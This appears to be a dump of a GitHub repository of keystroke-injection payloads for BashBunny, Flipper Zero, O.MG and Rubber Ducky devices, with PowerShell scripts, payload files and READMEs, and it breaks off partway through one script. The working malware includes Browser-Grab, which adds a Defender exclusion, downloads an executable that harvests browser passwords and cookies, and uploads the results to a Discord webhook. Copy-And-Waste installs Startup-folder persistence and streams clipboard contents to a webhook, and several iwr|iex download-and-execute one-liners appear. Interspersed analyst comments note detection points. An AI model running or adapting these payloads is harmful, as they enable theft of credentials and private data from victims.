Repository: atomiczsec/My-Payloads
Branch: main
Commit: 5f1da98a457a
Files: 224
Total size: 316.5 KB
Directory structure:
gitextract_2ly3q691/
├── Assets/
│ └── placeholder
├── BashBunny/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BBB.ps1
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Browser-Grab/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── cApS-Troll/
│ │ ├── README.md
│ │ ├── a.ps1
│ │ └── payload.txt
│ └── placeholder
├── FlipperZero/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Browser-Devil/
│ │ └── Browser-Devil/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ └── cApS-Troll/
│ ├── README.md
│ ├── a.ps1
│ └── payload.txt
├── Functions/
│ ├── placeholder
│ └── tidal-log.ps1
├── OMG/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BH.ps1
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Browser-Grab/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── cApS-Troll/
│ │ ├── README.md
│ │ ├── a.ps1
│ │ └── payload.txt
│ └── placeholder
├── README.md
└── RubberDucky/
└── payloads/
├── Bookmark-Hog/
│ ├── BH.ps1
│ ├── README.md
│ └── payload.txt
├── Browser-Grab/
│ ├── README.md
│ ├── b.ps1
│ └── payload.txt
├── Copy-And-Waste/
│ ├── I.bat
│ ├── README.md
│ ├── c.ps1
│ ├── payload.txt
│ └── placeholder
├── De-Bloater/
│ ├── README.md
│ └── payload.txt
├── Doc-Hog/
│ ├── d.ps1
│ ├── payload.txt
│ └── readme.md
├── History-Pig/
│ ├── HP.ps1
│ ├── README.md
│ └── payload.txt
├── OVPN-Hog/
│ ├── o.ps1
│ ├── payload.txt
│ └── readme.md
├── Picture-Hog/
│ ├── p.ps1
│ └── placeholder
├── Powershell-History/
│ ├── PH.ps1
│ ├── README.md
│ └── payload.txt
├── Printer-Recon/
│ ├── PR.ps1
│ ├── README.md
│ └── payload.txt
├── Priv-Paths/
│ ├── README.md
│ └── payload.txt
├── Proton-Hog/
│ ├── README.md
│ ├── payload.txt
│ └── s.ps1
├── Pwn-Drive/
│ ├── README.md
│ ├── c.ps1
│ └── payload.txt
├── RanFunWare/
│ ├── README.md
│ ├── payload.txt
│ └── r.ps1
├── Screen-Shock/
│ ├── I.bat
│ ├── README.md
│ ├── c.ps1
│ ├── payload.txt
│ └── placeholder
├── Spotify-Spy/
│ ├── README.md
│ ├── SS.ps1
│ └── payload.txt
├── Water-UnMark/
│ ├── README.md
│ ├── payload.txt
│ └── placeholder
├── cApS-Troll/
│ ├── README.md
│ ├── a.ps1
│ └── payload.txt
└── placeholder
================================================
FILE CONTENTS
================================================
================================================
FILE: Assets/placeholder
================================================
================================================
FILE: BashBunny/payloads/Bookmark-Hog/BBB.ps1
================================================
# Bookmark-Hog: copies the current user's Chrome and Edge bookmark files onto a
# mounted volume labelled "BashBunny".
# Analyst note: the observable behaviour is a WMI volume lookup followed by
# Copy-Item from browser profile directories to that volume.
# Resolve the device's drive root by volume label through WMI (gwmi = Get-WmiObject)
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Destination paths on the device: loot\Bookmark-Hog\<computer name>\...
$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
# NOTE(review): $TARGETDIR ends in Chromebm.txt, so when it is absent mkdir creates a
# directory with that name; the Chrome copy further down then targets that directory.
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
# Existence probe for the Chrome bookmark file; the boolean is written to output and not stored
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
# If the Chrome bookmark file does not exist, report it on the host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise copy the Chrome bookmark file to the device
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR"
}
# Edge bookmark file: this copy runs unconditionally, before the existence check below
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
# If the Edge bookmark file does not exist, report it on the host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise copy the Edge bookmark file to the device (same copy as above, repeated)
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
}
================================================
FILE: BashBunny/payloads/Bookmark-Hog/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmarks.
These files will be saved to the Bash Bunny in the loot directory.
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Let the magic happen
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Bookmark-Hog/payload.txt
================================================
# Title: Bookmark-Hog
# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.
# Author: atomiczsec
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID, Storage
# Target: Windows 10, 11
#
# Analyst summary: the device presents itself as a keyboard plus mass storage, opens the
# Windows Run dialog and types one PowerShell command that runs BBB.ps1 from the device.
# Detection points visible in this file: a new HID + storage device appearing together,
# and powershell.exe started with -NoP -NonI -W Hidden whose command line contains a
# win32_volume lookup for the label 'BashBunny'. Commands typed into the Run dialog are
# also recorded in the user's RunMRU registry key.
LED SETUP
# Read the hardware switch position; used below to locate payloads\<switch>\BBB.ps1
GET SWITCH_POSITION
# Enumerate as keyboard (HID) and removable drive (STORAGE) at the same time
ATTACKMODE HID STORAGE
LED STAGE1
# Wait for driver enumeration, then open the Run dialog (Win+R)
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
# Typed command: hidden, no-profile, non-interactive PowerShell that resolves the device's
# drive by volume label and dot-invokes BBB.ps1 from it
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
QUACK ENTER
================================================
FILE: BashBunny/payloads/Bookmark-Hog/placeholder
================================================
================================================
FILE: BashBunny/payloads/Browser-Grab/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Grab!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Browser-Grab
A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
## Description
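This payload will exclude the C: drive on the device so Windows Defender doesn't flag the exe. (The accompanying b.ps1 passes `$env:tmp` to `Add-MpPreference -ExclusionPath`; either way, a newly added Defender exclusion is itself a strong detection signal.)
This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers.
Finally, Discord will be used to exfiltrate the files to cloud storage.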
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Admin privileges on the Device you are targeting
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Browser-Grab/b.ps1
================================================
function Upload-Discord {
<#
.SYNOPSIS
Posts a text message and/or a file to the webhook URL stored in $hookurl.
.PARAMETER file
Optional path of a file to upload; sent as multipart form field "file1" by curl.exe.
.PARAMETER text
Optional message; sent as the JSON "content" field, with "username" set to $env:username.
.NOTES
Analyst note: network traces of this function are an HTTPS POST from powershell.exe
(Invoke-RestMethod) and a curl.exe child process with -F "file1=@<path>" on its command line.
#>
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
# Placeholder as published; a recovered copy holding a real URL identifies the receiving webhook
$hookurl = 'YOUR-DISCORD-WEBHOOK'
# The logged-on user's name is used as the sender name of the post
$Body = @{
'username' = $env:username
'content' = $text
}
# Text message: only sent when $text is non-empty
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
# File upload: only attempted when $file is non-empty; delegated to curl.exe
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
# Analyst summary of the sequence below: add an antivirus exclusion, download an
# executable into %TEMP%, run it hidden, zip its output and upload the archive.
# On-disk artefacts named in this file: %TEMP%\browser.exe, %TEMP%\results, %TEMP%\browserdata.zip.

# Add $env:tmp to the Windows Defender exclusions so the downloaded exe is not scanned there.
# Add-MpPreference needs an elevated session; Defender records configuration changes such as
# a new exclusion as event ID 5007 in its Operational log, which makes this step a
# high-value alert for defenders.
Add-MpPreference -ExclusionPath $env:tmp
# Download the exe and save it to the temp directory
iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe"
# Run the downloaded executable with a hidden window and wait for it to exit
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
# Archive the "results" directory (presumably written by browser.exe; not shown here)
# and upload the archive through Upload-Discord
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
Upload-Discord -file "$env:tmp\browserdata.zip"
================================================
FILE: BashBunny/payloads/Browser-Grab/payload.txt
================================================
REM Title: Browser-Grab
REM Author: atomiczsec
REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
REM Target: Windows 10
REM Analyst summary: keystroke injection that opens the Run dialog, starts an elevated
REM PowerShell (-verb runas), answers the elevation prompt from the keyboard, then types a
REM download-and-execute one-liner (iwr ... | iex).
REM Defensive notes: the ALT y step only works where the elevation prompt is a plain
REM consent dialog; standard-user accounts or a UAC policy that demands credentials stop
REM the chain at this point. PowerShell script block logging (event ID 4104) records the
REM script that iex runs.
Q DELAY 2000
REM Open the Run dialog (Win+R)
Q GUI r
Q DELAY 1000
REM Start a second, elevated PowerShell process
Q STRING powershell start-process powershell -verb runas
Q ENTER
Q DELAY 1000
REM ALT+y is sent in answer to the elevation prompt
Q ALT y
Q DELAY 1000
REM Typed into the elevated session: fetch a remote script and pipe it to Invoke-Expression
Q STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex
Q ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
================================================
FILE: BashBunny/payloads/Copy-And-Waste/I.bat
================================================
@echo off
REM Launcher for c.ps1: changes to the user's AppData\Roaming directory and runs c.ps1 in a
REM second PowerShell with a hidden window (-w h), no profile, non-interactive and
REM execution policy Bypass.
REM Analyst note: per the accompanying README this file is placed in the per-user Startup
REM folder, so a .bat there whose command line references c.ps1 and -Ep Bypass is the
REM persistence artefact to look for.
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: BashBunny/payloads/Copy-And-Waste/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup.
**c.ps1** will sit in the AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click.
The contents will then be sent to the Discord webhook for viewing pleasure.
To kill the script, press both Ctrl buttons at the same time [it will resume at reboot].
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Copy-And-Waste/c.ps1
================================================
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
<#
.SYNOPSIS
Posts one string to the webhook URL stored in $hookUrl.
.PARAMETER con
Mandatory text to send; becomes the "content" field, with "username" set to $env:username.
.NOTES
$Body is passed to Invoke-RestMethod as a hashtable without JSON conversion, so the
request goes out as form fields rather than a JSON document.
#>
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
# Placeholder as published; a recovered copy holding a real URL identifies the receiving webhook
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
# Send whatever is on the clipboard at start-up
dischat (get-clipboard)
# Poll the keyboard state forever. There is no sleep in this loop, so the hosting
# powershell.exe spins continuously; sustained CPU use by a hidden PowerShell process that
# has loaded PresentationCore/WindowsBase is a practical detection hint.
while (1){
# Current state of both Ctrl keys and of the C and X keys
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
# Ctrl+C or Ctrl+X held: post the clipboard contents (repeats on every pass while held)
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
# Both Ctrl keys held together: post a marker message and end the script
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}
================================================
FILE: BashBunny/payloads/Copy-And-Waste/payload.txt
================================================
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
REM Analyst summary: the typed PowerShell one-liner writes two downloaded files and starts one:
REM   - l.bat into the per-user Startup folder (persistence across logons)
REM   - c.ps1 into %APPDATA%, which it then runs
REM Detection points: a new script file appearing in ...\Start Menu\Programs\Startup, and
REM powershell.exe started with -w h -NoP -NonI -Ep Bypass whose command line holds two
REM iwr calls redirected to files.
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: BashBunny/payloads/Copy-And-Waste/placeholder
================================================
================================================
FILE: BashBunny/payloads/De-Bloater/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;De-Bloater!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# De-Bloater
A payload to quickly get "Windows10Debloater"
## Description
This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...
## Getting Started
### Dependencies
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
iwr -useb https://git.io/debloat|iex
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
[Sycnex](https://github.com/Sycnex/Windows10Debloater)
[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Doc-Hog/d.ps1
================================================
function Doc-Hog {
<#
.SYNOPSIS
Posts a text message and/or a file to the webhook URL stored in $hookurl.
.PARAMETER file
Optional path of a file to upload; sent as multipart form field "file1" by curl.exe.
.PARAMETER text
Optional message; sent as the JSON "content" field, with "username" set to $env:username.
.NOTES
Analyst note: the upload shows up as a curl.exe child of powershell.exe with
-F "file1=@<path>" on its command line.
#>
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
# Placeholder as published; a recovered copy holding a real URL identifies the receiving webhook
$hookurl = 'DISCORD-WEBHOOK'
$Body = @{
